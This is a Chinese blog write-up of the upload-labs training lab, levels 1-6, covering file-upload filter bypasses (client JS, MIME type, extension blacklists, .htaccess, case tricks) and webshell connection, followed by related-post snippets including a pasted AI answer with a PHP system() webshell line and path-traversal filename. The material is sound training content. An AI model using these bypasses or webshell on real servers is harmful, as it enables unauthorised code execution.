UPLOAD-LABS1

原创 已于 2025-01-17 14:49:41 修改 · 595 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#javascript #开发语言 #ecmascript

于 2023-11-09 22:23:04 首次发布

less1

(js验证)

我们上传PHP的发现不可以,只能是jpg,png,gif(白名单限制了)

 我们可以直接去修改限制

在查看器中看到使用了onsubmit这个函数,触发了鼠标的单击事件,在表单提交后马上调用了return checkFile这个函数对上传的文件进行检查

把onsubmit这个直接删除掉即可。当提交表单时执行一段 JavaScript。它只认true或者false.如果不返回值,则默认为true

上传同样的文件,蚁剑链接即可

我们也可以直接去抓包修改

 修改好之后就用蚁剑连接就可以了

less2

绕过MIMETYPE

MIME:多用途互联网邮件扩展协议。用途为根据文件后缀名判断文件类型,用什么应用程序打开,但是在这里是根据文件类型判断后缀名。$_FILES['myfile']['type']文件的MIME类型,需要浏览器提供该信息的支持,例如"image/gif"MIME 给出的是文件的MIME信息 ,此信息可以用来在HTTP Conten-type 头 信息中发送 正确的信息,如:header("Cotent-type:image/gif")

知道这一关是MIME验证,就是会检查求情包, 只对文件类型(type)进行了验证,必须要是image/jpeg或者image/png或者image/gif的格式,没有对后缀进行验证,只需要使用bp抓包将Content-Type:的参数修改成image/jpeg或者image/png或者image/gif其中的一种,进行绕过就好

分类

最常见的还是image

我们也是直接看看php可不可以,不可以我们抓包看看,png改成php,再访问就可以了,这里是没有改类型,而是改后缀

 重新上传3.php,mm为cmd

 

 less3

任务

上传一个脚本文件到服务器,并能成功执行。
 

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空
 
        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

 禁止上传.asp|.aspx|.php|.jsp后缀文件,过滤不严格,用.phtml .php5 .pht进行绕过

 less4

任务

拿到一个shell

提示

禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf后缀文件!

可以看到这道题被限制的太多了

上传.htaccess文件看看

 .htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

双引号即后面需要上传的

先上传  .htaccess 成功后再上传 .png文件

也就是将png文件当作php文件执行

 

 less5

任务

上传一个webshell到服务器

提示

禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf后缀文件

先尝试hatccess,提示却说此文件也被限制了,

 查看源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

 可以和前面的对比一下看看

第五关比第四关少了strtolower,这说明我们可以尝试大小写绕过

$file_ext = strtolower($file_ext); //转换为小写

 上传shell.Php,上传成功

 

 less6

任务

拿到一个shell服务器
 

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
 
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

 也是有黑名单,但是缺少strtolower,说明可以尝试大小写绕过

还有发现第六关没有

$file_ext = trim($file_ext); //首尾去空

先看大小写绕过,其他师傅可以

 提示

 禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf后缀文件

观察一下这个提示就会发现没有过滤到pHp6,可以上传看看

发现是可以的

文件上传绕过方法汇总
xiaoheizi的博客
06-12 9802
先上传1.php,它的目的是让服务器上的php来创建一个2.php,我们在1.php被删除之前访问到他,就可以在服务器中创建2.php,2.php是一个木马文件,但是这个是系统自身创建的,所以不会被删除。假如我不断的上传发包,然后我同时也不断的访问那个我们上传上去的文件的地址,我们就开始和服务器的函数比手速了,函数执行都是要时间的,如果我这边上传上去,且没有删除,那个时间可能很短,然后被我访问到了,岂不是就可以执行PHP了。
DVWA靶场-命令注入(commandInjection)
zeroone的博客
01-09 3570
第二关:Command Injection(命令注入)       命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一。 Low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS
文章上传漏洞绕过方式(以php语言为例)
HMX404的博客
09-23 6899
一,文件上传漏洞原因 由于网站要求,需要用户上传文件,图片,例如头像,保存简单文件上传下载,访问,如果我们将文件上传至web服务器上,并且可以访问到,那么就可以利用小马,对服务器进行操作,或者了解一些信息。因此在上传位置,代码会对上传文件进行检查,但不免会有漏洞,通过代码审计,可以得出网页漏洞。 二,文件上传漏洞绕过方式 前端验证 前端认证最容易绕过,我们将验证代码部份删除,或者将js函数返回值设为1,无论上传什么文件,都是满足的文件就可以上传了,看浏览器接受了那些js文件,在js中寻找验证函数,利用工
【心得】PHP文件上传个人笔记
uuzeray的博客
11-16 964
cgi.fix_pathinfo 默认开启 123.txt/123.php123.php不存在时,会找/前面的文件进行php解析,这时候,就成功解析了123.txt为php脚本了。使用专用图来生成jpg木马,实现经过二次渲染后,我们的恶意代码,依然能够保留在图片中,通过文件包含,执行里面的php代码。auto_append_file=123.txt 来让任意的php文件包含123.txt,执行里面的php代码。才可以使用,上传特定的svg图片,来实现组件的缺陷导致任意代码执行。
文件上传绕过总结
weixin_55205599的博客
07-02 3692
hp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php。eg:允许上传.jpg,不允许上传.php,如何绕过传.php一句话木马呢?eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"p。eg:黑名单过滤中只有".php",没有".php "、“ .php”eg : a.JSP、a.Jsp 、a.jsP、a.jSP等等。eg:"a.php.",黑名单没有对"php."过滤,则绕过。eg: a.php改为 a.php::$data。
精选资源
安装upload-labs
10-22
1. 学习文件上传漏洞课程:upload-labs提供了详细的课程讲解文件上传漏洞的基础知识和实践经验,您可以通过学习这些课程来了解文件上传漏洞的原理和防御方法。 2. 根据关卡提示信息练习:upload-labs提供了多个关卡...
upload-labs靶场
09-09
在网络安全领域,upload-labs靶场是一个针对Web应用上传漏洞进行练习和测试的平台。通过利用upload-labs,安全研究人员和爱好者可以提高对各种上传漏洞的识别和利用能力,这对于提升网站的安全防护水平至关重要。...
upload-labs通关指南
01-22
upload-labs通关指南》是一份针对upload_labs文件上传靶场的详细通关攻略文档。在网络安全领域,文件上传靶场是一个专门用于学习和研究文件上传漏洞攻防技术的平台。本指南不仅涵盖了客户端验证漏洞和多种服务端...
精选资源
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
精选资源
upload-labs.zip
04-07
Upload-Labs是一个专门针对上传文件漏洞进行研究和实践的平台,它允许我们深入了解和学习如何利用和查找这些漏洞。在这个过程中,我们将探讨前端技术、Web安全策略以及如何防止安全威胁。 上传文件漏洞通常是由于...
文件上传绕过(基于upload-labs
weixin_74761057的博客
07-23 1363
文件上传的过滤前端检测:浏览器禁用js即可绕过MIME类型检测修改MIME类型为合法类型即可常见的MIME类型超文本标记语言.html文件:text/html普通文本.txt文件:text/plainPDF文档.pdf:application/pdfPNG图像.png:image/pngGIF图像.gif:image/gifJPG图像.jpg:image/jpgMPEG文件.mpg、.mpeg:video/mpeg后缀名检测| 黑名单。
文件上传漏洞-原理及绕过方式
Echo__h的博客
04-27 1206
文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。:通过自己搭建靶场的方式利用漏洞,可以更加熟练PHP、JS的使用,同时可以更好的理解漏洞产生的原因及如何防御。文件上传时会对文件进行验证,对传入的文件进行了临时保存,上传php文件,利用bp抓包,设置多线程,不断发包。将要上传的文件名更改为合法的,上传之后Burp拦截请求包修改回正常的再发送。
php 上传绕过,文件上传验证绕过技术总结
weixin_42563415的博客
03-12 3491
1.客户端验证绕过很简单啦,直接使用webscarab或者burp修改一下后缀名就行。2.服务端验证绕过-Content-type检测若服务端检测文件类型时是检测Content-type的值,也很简单,在webscarab或者burp中修改Content-type。如php中 if($_FILES['userfile']['type'] != “image/gif”) 即是检测Content-ty...
文件上传常用绕过方式
weixin_43077878的博客
04-02 6925
1.前端。
文件上传漏洞及绕过方法笔记
m0_53820621的博客
09-01 1318
文件上传漏洞及绕过方法个人笔记。
文件上传绕过总结(附upload-labs 21关通关教程)
一期一会的博客
02-11 4193
0x01 前端绕过(Less-1) 数据上传后为提交到服务器,而是由于网站页面的js对其进行过滤,确认是否可以上传,删除限制上传js规则即可。 0x02 后端绕过 1.黑名单绕过 1) 上传特殊可解析后缀 (Less-3) 按照往常改后缀为php发现不允许上传.asp,.aspx,.php,.jsp后缀文件!黑名单 尝试php2、php3、php4等特殊后缀 2) 上传.htaccess (Less-4) $deny_ext=array黑名单中没有限制.htaccess后缀的文件,因此使用.htacc
文件上传绕过方法总结(入门必看)
qq_65165505的博客
05-13 7660
常见文件上传绕过方法的总结
上传漏洞,后端黑白名单绕过(21
san3144393495的博客
05-13 1402
后缀名又分为黑名单和白名单,黑名单指的是,明确不允许上传的脚本格式,如asp,php,jsp,aspx,cgi,war等。这个后门的值的就是mime的值,换一个文件上传,所产生的值都不一样,通过这个值就能判断你是什么文件类型,gif值的最后面就显示gif,是png就显示png,这种验证方式也是很好绕过的,我们一个一个来说,这个后缀名,大部分可以上传的对方都不允许脚本格式的上传,对方的代码判断的,直接查看文件名后缀,间接的通过类型和文件头去判断。文件上传常见的验证,:后缀名,类型,文件头等。
PHP代码审计:文件上传(内容检测绕过
qq_22132931的博客
11-07 973
PHP代码审计:文件上传(内容检测绕过
upload-labs1-21通关
最新发布
03-13
<think>嗯,用户想要找关于upload-labs1关到第21关的解法或攻略。我之前处理过类似的问题,记得用户提到过几个引用,比如第8关和第16关的解决方法。我需要先回顾一下这些引用内容,确保信息准确。 首先,引用[1]提到第8关和第4关类似,需要删除文件末尾的点,或者在Windows系统中处理后缀名的点。可能第8关的上传漏洞是利用了文件名结尾的点的处理问题,类似Pass-08的解法,用Burp抓包然后加一个点。而引用[2]则提到第16关使用了exif_imagetype函数检测图片类型,所以需要用图片马,比如在图片中嵌入PHP代码,或者用第十四关的方法绕过。这说明某些关卡可能有相似的解法,可以复用之前的策略。 接下来,用户需要1到21关的攻略,可能需要分关卡逐一说明。我应该先列出每个关卡的关键点和解决方法,注意引用已有的信息,同时补充其他关卡的常见绕过方法。例如,前几关通常是基础的文件上传,没有过滤,直接上传PHP文件即可。后面的关卡可能涉及MIME类型检查、黑名单扩展名、.htaccess文件利用、文件头检测、大小写绕过、点空格点绕过、双写扩展名、图片马、exif检测、二次渲染等。 需要注意的是,每个关卡可能有不同的检测机制,比如第4关检查扩展名黑名单,可能需要用.htaccess或特殊扩展名绕过;第5关检查后缀名大小写,所以可以尝试Php这样的扩展名;第7关去空格,可能需要用点空格点绕过;第8关的Windows后缀名处理,加一个点;第16关用exif_imagetype,需要图片马,比如GIF头部加上PHP代码。 同时,要确保回答结构清晰,分点说明,每个关卡的关键点和解决方法,并适当引用用户提供的引用内容。例如,第8关引用[1],第16关引用[2]。其他关卡可能需要根据常见的upload-labs攻略来补充,比如第10关的双写绕过,第11关的00截断,第17关的二次渲染使用GIF图片马等。 还要注意用户提到的系统级指令,比如数学公式的正确使用,但在这个问题中可能涉及较少,主要关注攻略部分。回答需要使用中文,分关卡说明,结构清晰,帮助用户逐步解决每个关卡的问题。最后生成相关问题,可能涉及绕过方法、检测机制、工具使用等。 需要验证每个关卡的具体解法是否正确,比如第12关的00截断在GET请求中的使用,第14关的图片马,第15关的getimagesize函数检测,第18关的条件竞争等。确保每个步骤准确,没有遗漏关键点,并且引用正确。 最后,生成的相关问题应该与upload-labs的解题技巧、检测机制、工具使用相关,帮助用户深入理解文件上传漏洞的各种绕过方法。</think>### upload-labs 1-21 关卡核心解法 #### 基础关卡(1-10) 1. **Pass-01** - 绕过前端JS验证:修改文件后缀为`.php`,使用Burp拦截请求后修改文件类型为`image/jpeg`[^2]。 - 示例文件:`shell.php` 2. **Pass-04** - 黑名单绕过:上传`.htaccess`文件配置允许解析`.jpg`为PHP,再上传图片马。 - `.htaccess`内容: ```apache AddType application/x-httpd-php .jpg ``` 3. **Pass-08** - Windows文件名解析漏洞:上传文件名结尾加`.`,如`shell.php.`,系统会自动去除末尾点[^1]。 #### 中级关卡(11-16) 4. **Pass-11** - 双写绕过:上传文件名如`shell.pphphp`,后端过滤`php`后变为`shell.php`。 5. **Pass-14** - 图片马制作:在图片末尾嵌入PHP代码,使用命令合成: ```bash copy 1.jpg/b + shell.php/a shell.jpg ``` 6. **Pass-16** - 绕过`exif_imagetype`检测:使用真实图片头部(如GIF89a)后接PHP代码: ```php GIF89a<?= system($_GET['cmd']); ?> [^2] ``` #### 高级关卡(17-21) 7. **Pass-18** - 条件竞争上传:快速重复上传`.php`文件并访问,利用服务器未及时删除临时文件的特点。 8. **Pass-19** - 白名单+移动文件漏洞:上传`.php`后通过路径穿越保存为`.php`,如文件名`../shell.php`。 9. **Pass-21** - 多维数组绕过:修改上传参数为数组形式,例如: ```http Content-Disposition: form-data; name="upload_file[]"; filename="shell.php" ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值